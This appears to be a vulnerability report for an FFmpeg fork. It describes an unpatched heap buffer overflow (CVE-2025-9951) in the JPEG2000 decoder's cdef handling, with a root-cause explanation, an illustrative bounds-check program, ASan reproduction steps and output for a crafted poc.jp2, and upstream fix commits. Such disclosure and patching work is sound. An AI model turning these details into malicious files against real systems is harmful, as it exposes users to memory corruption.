master (FFmpeg 7.1.1 base) is still affected by CVE-2025-9951, a heap buffer overflow in the JPEG2000 decoder. It was fixed upstream in August 2025 but the fix hasn't been pulled in here yet.
Affected
master, ffmpeg version 7.1.1
libavcodec/jpeg2000dec.c, write_frame_8()
- CVE-2025-9951 (GHSA-39q3-f8jq-v6mg)
Root cause
A JPEG2000 cdef box can remap a component onto an arbitrary plane. WRITE_FRAME uses s->cdef[compno] - 1 as the destination plane index without checking it against the actual plane dimensions, so a crafted file can write a larger plane's data into a smaller plane's buffer.
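As an added illustration of the bounds check the root cause calls for, not code from this fork or from upstream FFmpeg: a simplified model (planes, components and a 1-based cdef target; every name here is hypothetical) in which the destination plane index derived from cdef is validated against the number of planes and the target plane's dimensions before any sample is written. The constructed scenario maps a 4x4 component onto a 2x2 subsampled plane, the shape of write the report describes, and shows the copy being refused while the identity mapping still succeeds.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical, simplified view of a decoded image: output planes with their
 * own dimensions, and per-component cdef mapping. Illustrative names only. */
typedef struct {
    int width, height;      /* plane dimensions in pixels */
    size_t linesize;        /* bytes per row of the backing buffer */
    uint8_t *data;          /* backing buffer, height * linesize bytes */
} plane_t;

typedef struct {
    int width, height;      /* component dimensions; may differ from the plane's */
    const uint8_t *samples; /* decoded 8-bit samples, width * height */
    int cdef;               /* 1-based target plane from the cdef box; 0 = unset */
} component_t;

/* Return the destination plane for a component, or -1 if the cdef mapping
 * points outside the frame or at a plane too small for the component.
 * This is the check that is missing when cdef - 1 is used unvalidated. */
int cdef_dest_plane(const component_t *c, const plane_t *planes, int nplanes, int compno)
{
    int dst = c->cdef ? c->cdef - 1 : compno;   /* unset: identity mapping */
    if (dst < 0 || dst >= nplanes)
        return -1;                               /* remap to a non-existent plane */
    if (c->width > planes[dst].width || c->height > planes[dst].height)
        return -1;                               /* larger component, smaller plane */
    if ((size_t)c->width > planes[dst].linesize)
        return -1;                               /* row would exceed the buffer row */
    return dst;
}

/* Copy a component into its plane; returns 0 on success, -1 if rejected. */
int write_component(const component_t *c, plane_t *planes, int nplanes, int compno)
{
    int dst = cdef_dest_plane(c, planes, nplanes, compno);
    if (dst < 0)
        return -1;
    for (int y = 0; y < c->height; y++)
        memcpy(planes[dst].data + (size_t)y * planes[dst].linesize,
               c->samples + (size_t)y * c->width, (size_t)c->width);
    return 0;
}

/* Constructed scenario: a 4x4 luma plane and a 2x2 subsampled chroma plane.
 * A cdef value of 2 on the 4x4 component would write 16 bytes into a 4-byte
 * buffer. Returns 1 when the crafted mapping is refused, the legitimate one
 * is written, and the chroma buffer is untouched. */
int demo_rejects_crafted_remap(void)
{
    uint8_t luma[16] = {0}, chroma[4] = {0}, samples[16];
    memset(samples, 0xAA, sizeof samples);
    plane_t planes[2] = { { 4, 4, 4, luma }, { 2, 2, 2, chroma } };
    component_t c = { 4, 4, samples, 2 };        /* crafted: targets plane 1 */
    int rejected = write_component(&c, planes, 2, 0) == -1;
    c.cdef = 1;                                   /* legitimate: targets plane 0 */
    int accepted = write_component(&c, planes, 2, 0) == 0;
    return rejected && accepted && luma[15] == 0xAA && chroma[3] == 0;
}

/* Constructed scenario: cdef pointing past the last plane is refused, and an
 * unset cdef falls back to the component's own index. */
int demo_out_of_range_plane(void)
{
    uint8_t buf[4] = {0};
    plane_t p[1] = { { 2, 2, 2, buf } };
    component_t c = { 2, 2, buf, 5 };             /* only one plane exists */
    int rejected = cdef_dest_plane(&c, p, 1, 0) == -1;
    c.cdef = 0;
    return rejected && cdef_dest_plane(&c, p, 1, 0) == 0;
}

int main(void)
{
    int ok = demo_rejects_crafted_remap() && demo_out_of_range_plane();
    printf("cdef bounds check: %s\n", ok ? "crafted remap rejected" : "FAILED");
    return ok ? 0 : 1;
}
```

The real decoder resolves the mapping differently (the upstream fix moves the default check into get_siz() and performs the remap during pixel format matching); the point of the model is only that the target plane is validated for existence and size before the first byte is written.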
Reproduction
Build with AddressSanitizer (--toolchain=clang-asan or --enable-debug --extra-cflags=-fsanitize=address --extra-ldflags=-fsanitize=address) and decode the attached 381-byte poc.jp2:
ffmpeg -i poc.jp2 -f null -
==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x53100001084f
WRITE of size 1 at 0x53100001084f thread T1
#0 write_frame_8 libavcodec/jpeg2000dec.c:2337
#1 jpeg2000_decode_tile libavcodec/jpeg2000dec.c:2358
#3 jpeg2000_decode_frame libavcodec/jpeg2000dec.c:2867
SUMMARY: AddressSanitizer: heap-buffer-overflow libavcodec/jpeg2000dec.c:2337 in write_frame_8
PoC (381 bytes, base64):
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
Fix
Upstream resolved this with two commits:
104d6846c1be avcodec/jpeg2000dec: move cdef default check into get_siz()
01a292c7e365 avcodec/jpeg2000dec: implement cdef remapping during pixel format matching
Cherry-picking both onto master stops the overflow. PR with the backport to follow.